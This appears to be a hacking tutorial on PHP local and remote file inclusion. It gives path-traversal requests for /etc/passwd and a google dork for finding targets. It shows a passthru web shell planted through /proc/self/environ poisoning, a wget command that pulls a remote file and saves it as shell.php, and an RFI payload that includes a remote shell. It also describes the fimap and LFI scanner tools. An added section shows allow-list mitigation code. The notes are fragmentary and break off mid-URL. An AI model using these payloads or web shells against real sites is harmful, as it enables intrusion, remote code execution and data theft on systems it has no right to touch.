LFI - Local File Inclusion & RFI - Remote File Inclusion

LFI - Local File Inclusion

LFI includes a file from the server and shows it in our browser.
To see if a script is vulnerable to local file inclusion, request:

index.php?page=../../../../../../../../../etc/passwd


That shows the complete user information on that server, with paths.
Here ../ causes the script to move up one directory.
Multiple ../ cause the script to move to the top-level directory (/, the root of the
filesystem), and /etc/passwd is the Unix passwd file.

google dork: inurl:.php?page=


example: www.xxx.com/contacts.php?page=abc.php

test: www.xxx.com/contacts.php?page=../xyz.php

Now, on a Linux server there is /etc/passwd.

1... www.xyz.com/index
../
=../../../etc/passwd

etc/passwd file (google)
proc/self/environ is the writable file by end
or var/log/httpd-access.log is also writable

proc/self/environ
add-on: User Agent Switcher

config.php
<?php passthru($_GET['cmd']) ?>
../proc/self//environ&cmd=wget http://
t35.com/abc.txt O shell.php

config.php
ip
username
pwd

Done..
----------------------------------------------------------------------------------------------

RFI - Remote file inclusion


Remote File Inclusion (RFI) is a type of vulnerability most often found on websites.
It allows an attacker to include a remote file, usually through a script on the web
server. The vulnerability occurs due to the use of user-supplied input without
proper validation. This can lead to something as minimal as outputting the contents
of the file, but depending on the severity it can also lead to, to list a few:

   -> Code execution on the web server
   -> Code execution on the client side, such as JavaScript, which can lead to other
      attacks such as cross-site scripting (XSS)
   -> Denial of Service (DoS)
   -> Data Theft/Manipulation

By default allow_url_include is ON -----> in php.ini

www.xxx.com/contacts.php?page=http://www.abc.com/shell.php
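
A mitigation for both the LFI and the RFI requests shown above, as an added example that is not from the original post: the page parameter is looked up in an allow-list instead of being passed to include. The pages/ directory and the page names are assumptions.

```php
<?php
// Added example, not from the original post. Assumed layout: page templates
// live in ./pages/ next to this script; the file names are hypothetical.

// Vulnerable pattern behind the URLs above: the parameter goes straight into
// include, so ../ sequences and (with allow_url_include on) http:// URLs work.
//   include($_GET['page']);

const PAGES_DIR = __DIR__ . '/pages';

// Allow-list: request value => file on disk. Nothing from the request is
// ever used as part of a path.
const PAGES = [
    'home'     => 'home.php',
    'contacts' => 'contacts.php',
    'about'    => 'about.php',
];

function resolve_page(?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, PAGES)) {
        return null; // ../../etc/passwd, http://..., anything unknown
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and sit inside PAGES_DIR
    // (catches a symlink planted in the pages directory).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
// page[]=x arrives as an array, so only strings reach the lookup.
$path = resolve_page(is_string($page) ? $page : null);
if ($path === null) {
    http_response_code(404);
    // json_encode keeps newlines in the value from forging extra log lines.
    error_log('rejected page parameter: ' . json_encode($page));
    exit('Not found');
}
include $path;
```

Independently of the code, setting allow_url_include = Off in php.ini stops include from fetching http:// URLs, and open_basedir limits which files a traversal can reach.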


>> TOOL Descriptions:

FIMAP
FIMAP is a local and remote file inclusion (LFI/RFI) auditing tool.
fimap is a little Python tool which can find, prepare, audit, exploit and even Google automatically for local and remote file inclusion bugs in web apps. fimap should be something like sqlmap, just for LFI/RFI bugs instead of SQL injection.


Local File Inclusion Vulnerability Scanner


Description:
The Simple Local File Inclusion Vulnerability Scanner helps you to find LFI vulnerabilities.
This tool is only able to handle “simple” LFI vulnerabilities, but not complex ones.

Usage:
./lfi_scanner.py --url=

Usage example:
./lfi_scanner.py --url="http://www.example.com/page.php?file=mai
